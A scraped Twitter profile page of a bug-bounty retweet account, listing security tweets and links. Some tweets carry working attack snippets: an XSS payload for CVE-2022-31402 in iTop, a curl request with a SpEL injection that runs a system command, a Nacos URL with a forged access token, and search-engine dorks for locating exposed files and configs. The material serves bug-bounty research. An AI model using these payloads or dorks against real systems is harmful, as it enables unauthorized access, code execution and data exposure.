Bugbountyretweet (@bugbountyrt) 's Twitter Profile
Bugbountyretweet

@bugbountyrt

I retweet #bugbounty #bugbountytips

ID: 1437146461494337537

calendar_today12-09-2021 20:10:03

210 Tweet

48 Followers

118 Following

张惠倩 (@momika233) 's Twitter Profile Photo

CVE-2022-31402 iTop 3.0.1 XSS Vulnerability http://localhost/itop/webservices/export-v2.php"()%26%25<acx><ScRiPt%20>N8Zn(9266)</ScRiPt>

It's Steiner254 (@steiner254) 's Twitter Profile Photo

What I learned from reading 126* Information Disclosure Writeups #BugBounty #bugbountytips #CyberSecurity medium.com/@Sm9l/what-i-l…

张惠倩 (@momika233) 's Twitter Profile Photo

curl --location --request POST 'http://127.0.0.1:8080/demo' \ --header 'Content-Type: application/x-www-form-urlencoded' \ --data-urlencode 'keyword=T(java.lang.String).forName('\''java.lang.Runtime'\'').getRuntime().exec('\''whoami\'')'

OccupytheWeb (@three_cube) 's Twitter Profile Photo

Network Basics for Hackers: The Address Resolution Protocol (ARP) #network4hackers #arp #cybersecurity #mitm #cybersecurity hackers-arise.com/post/network-b…

Network Basics for Hackers: The Address Resolution Protocol (ARP) #network4hackers #arp #cybersecurity #mitm #cybersecurity 

hackers-arise.com/post/network-b…
张惠倩 (@momika233) 's Twitter Profile Photo

/nacos/v1/console/namespaces?&accessToken=eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTY3NTA4Mzg3N30.mIjNX6MXNF3FgQNTl-FduWpsaTSZrOQZxTCu7Tg46ZU&namespaceId=

Mike Takahashi (@taksec) 's Twitter Profile Photo

Google Dorks - File Storage: site:dropbox.com/s "example[.]com" site:box.com/s "example[.]com" site:docs.google.com inurl:"/d/" "example[.]com" Find sensitive data and company accounts #recon #bugbountytips #infosec #seo

Google Dorks - File Storage:

site:dropbox.com/s "example[.]com"
site:box.com/s "example[.]com"
site:docs.google.com inurl:"/d/" "example[.]com"

Find sensitive data and company accounts

#recon #bugbountytips #infosec #seo
newfolder (@newfolderj) 's Twitter Profile Photo

Hussein Daher Most of the time while testing Apis I , after looking your tweet can confirmt that uuid/../uuid or id/../id shows same respone but what would be exploitation of this specific scenario ? I did found PII critical by myid/../victimId but no idea about traversing that you mentioned

huli (@aszx87410) 's Twitter Profile Photo

I haven't played CTF for a while cause I am busy with other stuff like new job and moving to a new place(I am in Tokyo now!). But I still see some interesting challenges on twitter from time to time and really want to take a note, so here is it blog.huli.tw/2023/12/03/en/…

Vidoc Security Lab (@vidocsecurity) 's Twitter Profile Photo

Let's start looking for this vulnerability. To do so, you can: Google dork 🔎 1. Go to google.com 2. Search for - intitle:"index of" "parameters.yml.test" OR "parameters.yml.dist" - More information at exploit-db.com/ghdb/5986 Shodan dork 🔍 1. Go to

Let's start looking for this vulnerability. To do so, you can:  

Google dork 🔎
1. Go to google.com 
2. Search for - intitle:"index of" "parameters.yml.test" 
OR "parameters.yml.dist" - More information at 
exploit-db.com/ghdb/5986  

Shodan dork 🔍
1. Go to
Bugbountyretweet (@bugbountyrt) 's Twitter Profile Photo

Hey #CarHackers, If an attacker captures an unused code from a fob in a distant location and replays it to the car, why doesn't it not work?What's the secret behind the car's ability to detect captured signals? Car Hacking Village carfucar ꙅɿɘƚɔɘqꙅ BusesCanFly and -1 others Ayyappan Rajesh